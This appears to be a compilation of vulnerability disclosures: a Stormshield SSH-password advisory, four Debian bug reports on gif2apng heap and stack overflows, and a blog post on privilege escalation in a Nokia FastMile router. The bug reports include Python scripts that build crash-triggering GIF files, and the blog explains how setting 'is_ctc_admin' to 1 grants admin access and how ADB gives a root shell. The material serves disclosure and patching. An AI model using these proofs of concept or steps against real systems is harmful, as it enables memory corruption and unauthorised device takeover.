An issue was discovered in Stormshield Network Security (SNS) 4.2.2 through 4.2.7 (fixed in 4.2.8). Under a specific update-migration scenario, the first SSH password change does not properly clear the old password.

Advisory ID

CVE Number

Date discovered

Severity

Advisory revision

STORM-2021-069

CVE-2021-45885

12/13/2021

high

v1

**Vulnerability details**

Under specific update migration scenario, the first ssh password change does not properly clean the old one.

**Impacted products**

Products

Severity

Detail

Stormshield Network Security

high

SNS is impacted

**Revisions**

Version

Date

Description

v1

 12/29/2021

Initial release

![](https://advisories.stormshield.eu/wp-content/themes/mustang-lite/assets/img/separator.png)

**Stormshield Network Security**

**CVSS v3.1 Overall Score: 8.7      ![](https://advisories.stormshield.eu/wp-content/themes/mustang-lite/assets/img/hightransv3.png)**

**Analysis**

**Impacted version**

When migrating from versions <= 4.1.8 to version between 4.2.2 and 4.2.7 included : only for the first occurence, when a ssh password change is done, the previous password is not properly cleared.

*   SNS 4.2.2 – 4.2.7

**Workaround solution**

**Solution**

Manually clean up specific secret repository on the SNS : please refer to our **acknowledgement base** for detailed procedure.

*   Version 4.2.8 fix vulnerabilty

Attack Vector

Attack Complexity

Privileges Required

User Interaction

Scope

Confidentiality Impact

Integrity Impact

Availability impact

Adjacent Network

Low

None

None

Changed

High

High

High

CVSS Base score: 9.6

CVSS Vector: (AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Exploit Code Maturity

Remediation Level

Report Confidence

Proof of concept code

Official fix

Confirmed

CVSS Temporal score: 8.6

CVSS Vector: (AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C)

Confidentiality Requirement

Integrity Requirement

Availability Requirement

Medium

Medium

Medium

CVSS Environmental score: 8.7

CVSS Vector: (AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C/CR:M/IR:M/AR:M/MAV:X/MAC:X/MPR:X/MUI:X/MS:X/MC:X/MI:X/MA:X)

  

![](https://advisories.stormshield.eu/wp-content/themes/mustang-lite/assets/img/separator.png)

CVE-2021-45885: SNS: Lack of old ssh password cleanup

A remote code execution issue in the ping command on Poly Trio 8800 5.7.1.4145 devices allows remote authenticated users to execute commands via unspecified vectors.

CVE-2018-17875

An issue was discovered in gif2apng 1.9. There is a heap-based buffer overflow in the main function. It allows an attacker to write 2 bytes outside the boundaries of the buffer.

![version graph](https://bugs.debian.org/cgi-bin/version.cgi?height=2;found=gif2apng%2F1.9%2Bsrconly-3;absolute=0;collapse=1;package=gif2apng;width=2)

Reply or subscribe to this bug.

Toggle useless messages

**Report forwarded** to `debian-bugs-dist@lists.debian.org, Debian QA Group <packages@qa.debian.org>`:  
`Bug#1002687`; Package `gif2apng`. (Mon, 27 Dec 2021 11:48:04 GMT) (full text, mbox, link).

**Acknowledgement sent** to `Kolja Grassmann <koljagrassmann@mailbox.org>`:  
New Bug report received and forwarded. Copy sent to `Debian QA Group <packages@qa.debian.org>`. (Mon, 27 Dec 2021 11:48:04 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

Package: gif2apng
Version: 1.9+srconly-3
Severity: important
Tags: security

Dear Maintainer,

There is a heap based buffer overflow in the main function of the gif2apng application. The responsible code looks as follows:

    delays = (unsigned short \*)malloc(frames\*2);
    if (delays == NULL)
      return 1;
\[...\]
          if (val == 0xF9)
          {
            if (fread(&size, 1, 1, f1) != 1) return 1;
            if (fread(&flags, 1, 1, f1) != 1) return 1;
            if (fread(&delay, 2, 1, f1) != 1) return 1;
            if (fread(&t, 1, 1, f1) != 1) return 1;
            if (fread(&end, 1, 1, f1) != 1) return 1;
            has\_t = flags & 1;
            dispose\_op = (flags >> 2) & 7;
            if (dispose\_op > 3) dispose\_op = 3;
            if (dispose\_op == 3 && n == 0) dispose\_op = 2;
            if (delay > 1) delays\[n\] = delay;
          }

The variable n is used to count the frames. The problem is that if we enter the if statement at the very end of the gif file, then n is equal to frames. This means, that the write to the delays buffer overwrites the two bytes after the delays buffer.

The following script generates a poc.gif file, that should cause a crash:

#!/bin/python3

# Writing to poc.gif
f = open("poc.gif", "wb")

sig = b"GIF87a"
w = b"\\x10\\x00"
h = b"\\x10\\x00"
flags\_one = b"\\x00"
bcolor = b"\\x01"
aspect = b"\\x01"

data = sig + w + h + flags\_one + bcolor + aspect
f.write(data)

# Writting more frames to produce crash:
for i in range(0,28):
    # Going into the id 0x2c path, so that there is a frame
    id = b"\\x2c"
    w0 = b"\\x01\\x00"
    y0 = b"\\x00\\x00"
    x0 = b"\\x00\\x00"
    h0 = b"\\x01\\x00" # Getting past our own size checks
    flags\_two = b"\\x00"

    data = id + x0 + y0 + w0 + h0 + flags\_two
    f.write(data)

    # DecodeLZW
    mincode = b"\\x07"
    f.write(mincode)
    for i in range(0,512):
        # Size value and byte we write to the heap
        target\_char = b"\\x01" + b"A"
        f.write(target\_char)
        # Resetting the values using "clearcode" to keep the code path as simple as possible
        clear\_code = b"\\x01" + b"\\x80"
        f.write(clear\_code)
    # Leaving function
    target\_char = b"\\x00"
    f.write(target\_char)

# Triggering the vulnerable code path
id = b"\\x21"
val = b"\\xf9"
size = b"\\xff"
flags\_two = b"\\x00"
delay = b"\\xff\\xff"
t = b"\\x00"
end = b"\\x00"

data = id + val + size + flags\_two + delay + t + end
f.write(data)

# Breaking out of while loop
f.write(b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")

f.close()

The generated poc.gif file causes a memory curruption on the heap when converted with the current gif2apng version:
$ gif2apng -i0 poc.gif /dev/null

gif2apng 1.9 using ZLIB

Reading 'poc.gif'...
28 frames.
Writing 'poc.png'...
28 frames.
munmap\_chunk(): invalid pointer
Abgebrochen


This buffer overflow allows an attacker to write two arbitrary bytes after the delays buffer.

I did a rudimentary fix in my local version of the program by adding a boundary check to the if statement in the code:
          if (val == 0xF9)
          {
            if (fread(&size, 1, 1, f1) != 1) return 1;
            if (fread(&flags, 1, 1, f1) != 1) return 1;
            if (fread(&delay, 2, 1, f1) != 1) return 1;
            if (fread(&t, 1, 1, f1) != 1) return 1;
            if (fread(&end, 1, 1, f1) != 1) return 1;
            has\_t = flags & 1;
            dispose\_op = (flags >> 2) & 7;
            if (dispose\_op > 3) dispose\_op = 3;
            if (dispose\_op == 3 && n == 0) dispose\_op = 2;
            if (delay > 1 && n < frames) {
              delays\[n\] = delay;
            }
          }

This fixed the crash for me locally. However I am not sure if this is a clean solution as I have no idea if this can happen in a valid image. If this code path is not possible in a valid image it might be better to stop processing the image at this point.

Best regards
Kolja



-- System Information:
Debian Release: 10.11
  APT prefers oldstable-updates
  APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86\_64)

Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT\_OOT\_MODULE, TAINT\_UNSIGNED\_MODULE
Locale: LANG=de\_DE.UTF-8, LC\_CTYPE=de\_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de\_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages gif2apng depends on:
ii  libc6       2.28-10
ii  libzopfli1  1.0.2-1
ii  zlib1g      1:1.2.11.dfsg-1

gif2apng recommends no packages.

Versions of packages gif2apng suggests:
pn  apng2gif  <none>

-- no debconf information

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org\>. Last modified: Tue Dec 28 01:30:08 2021; Machine Name: bembo

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.

CVE-2021-45911: #1002687 - gif2apng: Heap based buffer overflow in processing of delays in the main function

An issue was discovered in gif2apng 1.9. There is a stack-based buffer overflow involving a while loop. An attacker has little influence over the data written to the stack, making it unlikely that the flow of control can be subverted.

![version graph](https://bugs.debian.org/cgi-bin/version.cgi?absolute=0;package=gif2apng;height=2;width=2;collapse=1;found=gif2apng%2F1.9%2Bsrconly-3)

Reply or subscribe to this bug.

Toggle useless messages

**Report forwarded** to `debian-bugs-dist@lists.debian.org, Debian QA Group <packages@qa.debian.org>`:  
`Bug#1002669`; Package `gif2apng`. (Sun, 26 Dec 2021 23:15:04 GMT) (full text, mbox, link).

**Acknowledgement sent** to `Kolja Grassmann <koljagrassmann@mailbox.org>`:  
New Bug report received and forwarded. Copy sent to `Debian QA Group <packages@qa.debian.org>`. (Sun, 26 Dec 2021 23:15:04 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

Package: gif2apng
Version: 1.9+srconly-3
Severity: normal
Tags: security

Dear Maintainer,

There are two stack based buffer overflows in the gif2apng application. The responsible code is located in the DecodeLZW function and looks as follows:

void DecodeLZW(unsigned char \* img, unsigned int img\_size, FILE \* f1) // added
parameter img\_size
{
  int i, bits, codesize, codemask, clearcode, nextcode, lastcode;
  unsigned int   j;
  unsigned int   size = 0;
  unsigned int   accum = 0;
  unsigned short prefix\[4097\];
  unsigned char  suffix\[4097\];
  unsigned char  str\[4097\];
  unsigned char  data\[1024\];
  unsigned char  firstchar = 0;
  unsigned char \*pstr = str;
  unsigned char \*pout = img;
  unsigned char  mincodesize;

  if (fread(&mincodesize, 1, 1, f1) != 1) return;

  bits = 0;
  codesize = mincodesize + 1;
  codemask = (1 << codesize) - 1;
  clearcode = 1 << mincodesize;
  nextcode = clearcode + 2;
  lastcode = -1;

  for (i=0; i<clearcode; i++)
    suffix\[i\] = i;
\[...\]
        while (code >= clearcode)
        {
          \*pstr++ = suffix\[code\];
          code = prefix\[code\];
        }

In both loops at the end it is possible to write over the boundaries of the buffer by providing certain values a part of the gif file. For the for loop we can provide a large value for mincodesize leading to a clearcode bigger than 4097 and therefore overflowing the buffer. In the while loop we can provide code values, that repeat so that prefix\[code\] results in the same code again.

I wrote the following script to generate a poc.gif file:

#!/bin/python3

# Writing to poc.gif
f = open("poc.gif", "wb")
# Data needed to enter the code path:
beginning = b"GIF87a" + b"\\x10\\x00\\x10\\x00" + b"\\x01" \* 3 + b"\\x2c" + b"\\x01" \*
9
f.write(beginning)


mincode = b"\\x07"
# Uncomment the following line to trigger the other crash
# mincode = b"\\x10"
f.write(mincode)

# Size value and byte we write to the heap
target\_char = b"\\x01" + b"\\xff\\xfe"\*10000
f.write(target\_char)

f.close()

The poc.gif file generated by the script does trigger the overflow in the while loop. If the other value for mincode is used it should trigger the overflow in the for loop. Using the poc.gif file as follows led to a segmentation fault:
$ gif2apng -i0 poc.gif /dev/null

gif2apng 1.9 using ZLIB

Reading 'poc.gif'...
Speicherzugriffsfehler

As I see no way to control the data, that is written in the loops I do not think, that this can necessarily exploited to gain code execution.

I fixed the issue locally by introducing a variable, that keeps track of the amount of data written to the pstr pointer and by doing some boundary checks before writing to the buffers:

if (clearcode > 4097) { // Added to avoid stack overflow here
    printf("Invalid Image\\n");
    exit(0);
  }
  for (i=0; i<clearcode; i++)
    suffix\[i\] = i;
\[...\]
        if (code >= nextcode)
        {
          if ( write\_counter <= 4097) { // Added to fix stack overflow here
            \*pstr++ = firstchar;
            write\_counter++;
            code = lastcode;
          }
          else {
            printf("Invalid Image\\n");
            exit(0);
          }
        }

        while (code >= clearcode)
        {
          if ( write\_counter <= 4097) { // Added to fix stack overflow here
            \*pstr++ = suffix\[code\];
            write\_counter++;
            code = prefix\[code\];
          }
          else {
            printf("Invalid Image\\n");
            exit(0);
          }
        }
        if ( write\_counter <= 4097) { // Added to fix stack overflow here
          \*pstr++ = firstchar = suffix\[code\];
          write\_counter++;
        }
        else {
          printf("Invalid Image\\n");
          exit(0);
        }

This seemed to fix the issue for me locally, but it could use some more testing.

Best regards
Kolja





-- System Information:
Debian Release: 10.11
  APT prefers oldstable-updates
  APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86\_64)

Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT\_OOT\_MODULE, TAINT\_UNSIGNED\_MODULE
Locale: LANG=de\_DE.UTF-8, LC\_CTYPE=de\_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de\_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages gif2apng depends on:
ii  libc6       2.28-10
ii  libzopfli1  1.0.2-1
ii  zlib1g      1:1.2.11.dfsg-1

gif2apng recommends no packages.

Versions of packages gif2apng suggests:
pn  apng2gif  <none>

-- no debconf information

**Added tag(s) upstream.** Request was from `Salvatore Bonaccorso <carnil@debian.org>` to `control@bugs.debian.org`. (Sun, 26 Dec 2021 23:21:10 GMT) (full text, mbox, link).

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org\>. Last modified: Tue Dec 28 01:30:18 2021; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.

CVE-2021-45908: #1002669 - gif2apng: Two stack based buffer overflows in the DecodeLZW function

An issue was discovered in gif2apng 1.9. There is a heap-based buffer overflow within the main function. It allows an attacker to write data outside of the allocated buffer. The attacker has control over a part of the address that data is written to, control over the written data, and (to some extent) control over the amount of data that is written.

**Debian Bug report logs - #1002667  
gif2apng: Heap based buffer overflow in the main function**

![version graph](https://bugs.debian.org/cgi-bin/version.cgi?found=gif2apng%2F1.9%2Bsrconly-3;height=2;collapse=1;width=2;absolute=0;package=gif2apng)

Reply or subscribe to this bug.

Toggle useless messages

**Report forwarded** to `debian-bugs-dist@lists.debian.org, Debian QA Group <packages@qa.debian.org>`:  
`Bug#1002667`; Package `gif2apng`. (Sun, 26 Dec 2021 22:48:03 GMT) (full text, mbox, link).

**Acknowledgement sent** to `Kolja Grassmann <koljagrassmann@mailbox.org>`:  
New Bug report received and forwarded. Copy sent to `Debian QA Group <packages@qa.debian.org>`. (Sun, 26 Dec 2021 22:48:04 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

Package: gif2apng
Version: 1.9+srconly-3
Severity: important
Tags: security

Dear Maintainer,

I found a heap overflow in the main function of the gif2apng application. The issue exists within the for loops in the following code from the main function in gif2apng.cpp:

          if (coltype == 2)
          {
            for (j=0; j<h0; j++)
            {
              k = j; if (interlaced) k = (j>h2) ? (j-h2)\*2-1 : (j>h2/2) ? (j-h2/2)\*4-2 : (j>h2/4) ? (j-h2/4)\*8-4 : j\*8;
              src = buffer + j\*w0;
              dst = frame0 + ((k+y0)\*w + x0)\*3;
              for (i=0; i<w0; i++, src++, dst+=3)
                if (!has\_t || \*src != t)
                  memcpy(dst, &pal\_l\[\*src\]\[0\], 3);
            }
          }
          else
          {
            for (j=0; j<h0; j++)
            {
              k = j; if (interlaced) k = (j>h2) ? (j-h2)\*2-1 : (j>h2/2) ? (j-h2/2)\*4-2 : (j>h2/4) ? (j-h2/4)\*8-4 : j\*8;
              src = buffer + j\*w0;
              dst = frame0 + (k+y0)\*w + x0;
              if (shuffle)
              {
                for (i=0; i<w0; i++, src++, dst++)
                  if (!has\_t || \*src != t)
                    \*dst = sh\[\*src\];
              }
              else
              {
                for (i=0; i<w0; i++, src++, dst++)
                  if (!has\_t || \*src != t)
                    \*dst = \*src;
              }
            }
          }

The variable frame0 points to a buffer of size w \* h \* 3 or size w \* h depending on the code path. The buffer variable points to a buffer holding user controllable data from the provided gif file. The variables w0, h0, x0 and y0 are also read from the gif file provided to the program without any validation. By choosing these values in the right way it is possible to manipulate the address, that data is written to as well as the number of bytes that are copied to the destination.

I wrote the following poc script, which creates a poc.gif file:

#!/bin/python3

# Writing to poc.gif
f = open("poc.gif", "wb")

sig = b"GIF87a"
w = b"\\x10\\x00"
h = b"\\x10\\x00"
flags\_one = b"\\x00"
bcolor = b"\\x01"
aspect = b"\\x01"

data = sig + w + h + flags\_one + bcolor + aspect
f.write(data)

id = b"\\x2c"
w0 = b"\\xff\\x00"
y0 = b"\\x00\\x00"
x0 = b"\\xff\\x00"
h0 = b"\\x02\\x00"
flags\_two = b"\\x00"

data = id + x0 + y0 + w0 + h0 + flags\_two
f.write(data)

# DecodeLZW
mincode = b"\\x07"
f.write(mincode)
for i in range(0,512):
    # Size value and byte we write to the buffer
    target\_char = b"\\x01" + b"A"
    f.write(target\_char)
    # Resetting the values using "clearcode" to keep the code path as simple as
possible
    clear\_code = b"\\x01" + b"\\x80"
    f.write(clear\_code)
# Leaving function
target\_char = b"\\x00"
f.write(target\_char)

f.write(b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")

f.close()

Executing the following on the package from the testing repository on Debian 10 lead to a memory corruption issue:
user@debian:~$ gif2apng -i0 poc.gif /dev/null

gif2apng 1.9 using ZLIB

Reading 'poc.gif'...
1 frames.
Writing 'poc.png'...
1 frames.
double free or corruption (out)
Abgebrochen

I have not looked into exploiting this bug. However as it allows us to write arbitrary data to an address outside of the intended buffer and as we have control over parts of the address as well as the data that is written, this could in my opinion be exploitable.

I did a rudimentary fix for this issue locally by doing a bounds check before entering the for loops. However I am not sure if this is the cleanest solution, as this does only adresses the buffer overflow and not the lack of sanity
checks performed on the image data. It could also use some more testing.

          if (coltype == 2)
          {
            for (j=0; j<h0; j++)
            {
              k = j; if (interlaced) k = (j>h2) ? (j-h2)\*2-1 : (j>h2/2) ?
(j-h2/2)\*4-2 : (j>h2/4) ? (j-h2/4)\*8-4 : j\*8;
              src = buffer + j\*w0;
              dst = frame0 + ((k+y0)\*w + x0)\*3;
              if ( ( (j\*w0 + w0) > buffer\_size) || ( ((((k+y0)\*w + x0)\*3) + w0
\* 3 ) > imagesize) ||  ((((k+y0)\*w + x0)\*3) < 0 ) ||  ( (j\*w0) < 0)) {
                printf("Something is wrong with the size values\\n");
                exit(0);
              }
              for (i=0; i<w0; i++, src++, dst+=3)
                if (!has\_t || \*src != t)
                  memcpy(dst, &pal\_l\[\*src\]\[0\], 3);
            }
          }
          else
          {
            for (j=0; j<h0; j++)
            {
              k = j; if (interlaced) k = (j>h2) ? (j-h2)\*2-1 : (j>h2/2) ?
(j-h2/2)\*4-2 : (j>h2/4) ? (j-h2/4)\*8-4 : j\*8;
              src = buffer + j\*w0;
              dst = frame0 + (k+y0)\*w + x0;
              if ( ( (j\*w0 + w0) > buffer\_size) || ( (((k+y0)\*w + x0) + w0 ) >
imagesize) ||  ((((k+y0)\*w + x0)) < 0 ) ||  ( (j\*w0) < 0)) {
                printf("Something is wrong with the size values\\n");
                exit(0);
              }
              if (shuffle)
              {
                for (i=0; i<w0; i++, src++, dst++)
                  if (!has\_t || \*src != t)
                    \*dst = sh\[\*src\];
              }
              else
              {
                for (i=0; i<w0; i++, src++, dst++)
                  if (!has\_t || \*src != t)
                    \*dst = \*src;
              }
            }
          }


Best regards
Kolja




-- System Information:
Debian Release: 10.11
  APT prefers oldstable-updates
  APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86\_64)

Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT\_OOT\_MODULE, TAINT\_UNSIGNED\_MODULE
Locale: LANG=de\_DE.UTF-8, LC\_CTYPE=de\_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de\_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages gif2apng depends on:
ii  libc6       2.28-10
ii  libzopfli1  1.0.2-1
ii  zlib1g      1:1.2.11.dfsg-1

gif2apng recommends no packages.

Versions of packages gif2apng suggests:
pn  apng2gif  <none>

-- no debconf information

**Added tag(s) upstream.** Request was from `Salvatore Bonaccorso <carnil@debian.org>` to `control@bugs.debian.org`. (Sun, 26 Dec 2021 23:03:07 GMT) (full text, mbox, link).

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org\>. Last modified: Tue Dec 28 01:30:11 2021; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.

CVE-2021-45910: #1002667 - gif2apng: Heap based buffer overflow in the main function

An issue was discovered in gif2apng 1.9. There is a heap-based buffer overflow vulnerability in the DecodeLZW function. It allows an attacker to write a large amount of arbitrary data outside the boundaries of a buffer.

![version graph](https://bugs.debian.org/cgi-bin/version.cgi?collapse=1;width=2;absolute=0;package=gif2apng;found=gif2apng%2F1.9%2Bsrconly-3;height=2)

Reply or subscribe to this bug.

Toggle useless messages

**Report forwarded** to `debian-bugs-dist@lists.debian.org, Debian QA Group <packages@qa.debian.org>`:  
`Bug#1002668`; Package `gif2apng`. (Sun, 26 Dec 2021 23:00:04 GMT) (full text, mbox, link).

**Acknowledgement sent** to `Kolja Grassmann <koljagrassmann@mailbox.org>`:  
New Bug report received and forwarded. Copy sent to `Debian QA Group <packages@qa.debian.org>`. (Sun, 26 Dec 2021 23:00:04 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

Package: gif2apng
Version: 1.9+srconly-3
Severity: important
Tags: security

Dear Maintainer,

There is a heap based buffer overflow in the gif2apng package. The vulnerability is located in the DecodeLZW function in the gif2apng.cpp file. The problem here is, that this function writes to a buffer, that was allocated using malloc without checking the size of this buffer. Therefore it is possible to provide a gif to the program, that contains more data than fits into this buffer leading to a memory corruption on the heap. I wrote the following poc script in python:

#!/bin/python3

# Writing to poc.gif
f = open("poc.gif", "wb")
# Data needed to enter the code path:
beginning = b"GIF87a" + b"\\x10\\x00\\x10\\x00" + b"\\x01" \* 3 + b"\\x2c" + b"\\x01" \*
9
f.write(beginning)

# Value needed in the vulnerable function
mincode = b"\\x07"
f.write(mincode)
for i in range(0,10000):
      # Size value and byte we write to the heap
      target\_char = b"\\x01" + b"A"
      f.write(target\_char)
      # Resetting the values using "clearcode" to keep the code path as simple
as possible
      clear\_code = b"\\x01" + b"\\x80"
      f.write(clear\_code)

f.close()

This script creates a file called poc.gif, which writes 10000 "A"'s into a buffer of size 512 leading to memory corruption on the heap. I tested this on Debian 10 using the current version of the package from the testing repository and got the following output:
$ gif2apng -i0 poc.gif /dev/null

gif2apng 1.9 using ZLIB

Reading 'poc.gif'...
1 frames.
malloc(): corrupted top size
Abgebrochen

This vulnerability seems to allow a write of an arbitrary number of arbitrary bytes. Therefore I think it likely, that this could be exploited.

To fix this issue locally I added a buffer\_size variable to the main function, which holds the size of the allocated buffer (the imagesize value used initially for the allocation was overwritten at some point). I then passed this value to the DecodeLZW function and added two if-statements around the writes to the the buffer to check whether the buffer can hold more bytes. My code looks as follows:

void DecodeLZW(unsigned char \* img, unsigned int img\_size, FILE \* f1) // added
parameter img\_size
{
      unsigned int bytes\_written = 0;
\[...\]
            if (lastcode == -1)
            {
               if (bytes\_written < img\_size) { // Added if-statement
                  \*pout++ = suffix\[code\];
                  bytes\_written++;
               }
               else {
                  printf("Invalid image size\\n");
                  exit(0);
               }
               firstchar = lastcode = code;
               continue;
            }
\[...\]
            do
            {
               if (bytes\_written < img\_size) { // Added if-statement
                  \*pout++ = \*--pstr;
                  bytes\_written++;
               }
               else {
                  printf("Invalid image size\\n");
                  exit(0);
               }
            }
            while (pstr >  str);
\[...\]
int main(int argc, char\*\* argv)
{
   unsigned int       buffer\_size = 0; // New variable to hold the size of the
buffer
\[...\]
      grayscale = 1;

      buffer\_size = imagesize\*2; // New variable, as imagesize is overwritten
at some point
      buffer = (unsigned char \*)malloc(buffer\_size);
      if (buffer == NULL)
      {
         printf("Error: not enough memory\\n");
         return 1;
      }
\[...\]
            DecodeLZW(buffer, buffer\_size, f1); // Added buffer\_size
\[...\]
               DecodeLZW(buffer, buffer\_size, f1); // Added Buffer size
\[...\]

This compiled successfully and fixed the buffer overflow for me. I am however not sure if this is the cleanest way to fix the issue and it could use some more testing.

Best regards
Kolja



-- System Information:
Debian Release: 10.11
  APT prefers oldstable-updates
  APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86\_64)

Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT\_OOT\_MODULE, TAINT\_UNSIGNED\_MODULE
Locale: LANG=de\_DE.UTF-8, LC\_CTYPE=de\_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de\_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages gif2apng depends on:
ii  libc6       2.28-10
ii  libzopfli1  1.0.2-1
ii  zlib1g      1:1.2.11.dfsg-1

gif2apng recommends no packages.

Versions of packages gif2apng suggests:
pn  apng2gif  <none>

-- no debconf information

**Added tag(s) upstream.** Request was from `Salvatore Bonaccorso <carnil@debian.org>` to `control@bugs.debian.org`. (Sun, 26 Dec 2021 23:03:08 GMT) (full text, mbox, link).

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org\>. Last modified: Tue Dec 28 01:30:14 2021; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.

CVE-2021-45909: #1002668 - gif2apng: Heap based buffer overflow in the DecodeLZW function

Nokia FastMile 3TG00118ABAD52 devices allow privilege escalation by an authenticated user via is_ctc_admin=1 to login_web_app.cgi and use of Import Config File.

As a part of my 5G home internet offering, Optus bundles a 5G gateway called the Nokia Fastmile. The same device seems to be shipped by T-Mobile for their 5G offering and is passionately known as the 'trashcan' in r/tmobileisp.

![](https://eddiez.me/content/images/2021/10/ResrcID22518_GW_bottom.png)

Nokia Fastmile Stock Photo

Naturally, the first thing I tried to do is to obtain root access on it.

**Finding a Privilege Escalation Bug**

EDIT: This has been assigned CVE-2021-45896.

Immediately, the first thing I noticed is that the provided userAdmin credentials printed on the bottom of the device seem to be a low level account.

Taking a peak at the requests going on when logging in immediately reveals an authenticated privilege escalation vulnerability. This likely also affects other Nokia devices. My firmware version: 3TG00118ABAD52.

When logging in, a call is made to POST /login\_web\_app.cgi.

If you intercept the response you will see that there is a variable called "is\_ctc\_admin".

![](https://eddiez.me/content/images/2021/10/image-2.png)

Change "is\_ctc\_admin" to 1

If you change this in the response to 1 you get access to additional functionality and full admin. The vulnerability is a classic access control issue where authorisation is handled only on the client side.

Now we have access to an additional tab but also more functionality in some existing tabs.

![](https://eddiez.me/content/images/2021/10/image-3.png)

SPAN Ports!

![](https://eddiez.me/content/images/2021/10/image-7.png)

QOS

![](https://eddiez.me/content/images/2021/10/image-4.png)

Backup and Restore Configuration

**Modifying the Configuration**

Doing some Googling I came across this smart guy who figured out the format of Nokia's configuration file format and wrote a tool to unpack, and pack configuration files so that you can make changes that aren't available through the web interface.

Unlocking IAM’s Nokia G-240W-A router (Part 1) · 0x41.cf

![](https://0x41.cf/favicon.png)

![](https://i.0x41.cf/b/nokia-g-240w-a.png)

The tool he wrote also works for the Nokia Fastmile: https://gist.github.com/thedroidgeek/80c379aa43b71015d71da130f85a435a

Following the write-up gets us all the way to SSH/Telnet access to the device however we are stopped by this annoying password prompt for shell access.

None of the passwords in the configuration file work for this shell password.

![](https://eddiez.me/content/images/2021/10/image-8.png)

???

Some other comments mention changing LimitAccount\_ONTUSER to false and logging in with ONTUSER:SUGAR2A041 however this doesn't seem to work for the Fastmile.

**Giving Up and Moving to Looking at Hardware**

randomsrvapps over at Whirlpool seems to have managed to get a trivial root shell via UART/ADB revealing that the device is Android based? Lets verify this.

Flipping the device over we see some ports that seem to be covered (circled in yellow on the photo).

![](https://eddiez.me/content/images/2021/11/4032-3024-resize.jpg)

These stickers can only be uncovered from the rear as the stickers they used are quite strong. By undoing circled bolts in red (Torx T15H) and removing the sim card, the feet come off and we can poke out the stickers.

This reveals a USB-C port and two RJ12 ports.

![](https://eddiez.me/content/images/2021/11/3024-4032-resize-crop.jpg)

USB-C is Top Right

**It runs Android?**

As per the thread, plugging into the USB-C port and running ADB shell gives us an immediate root shell on the device.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-13-16-50-43.png)

Interestingly it has a Snapdragon 855 in it, the same processor that was in previous generation flagships like the Google Pixel 4.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-20-22-43-15.png)

Snapdragon 855

I also confirmed that you can get this same console access by plugging into the pins outlined in the thread. These terminals are 1.8v logic level and the pins from inside to out are RX, TX, and ground with a baud rate of 115200.

![](https://eddiez.me/content/images/2021/11/3024-4033-resize-canvas.jpg)

Having a poke around via ADB shell reveals some oddities.

The most noteworthy being that the IP addressing scheme of my local network configured via the WEB-UI (172.10.0.0/24) is non-existent and some random private subnet 192.168.85.0/24 shows up.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-21-08-14-26.png)

Performing a traceroute from my local machine we see traffic get routed through this 192.168.85.0/24 subnet as well.

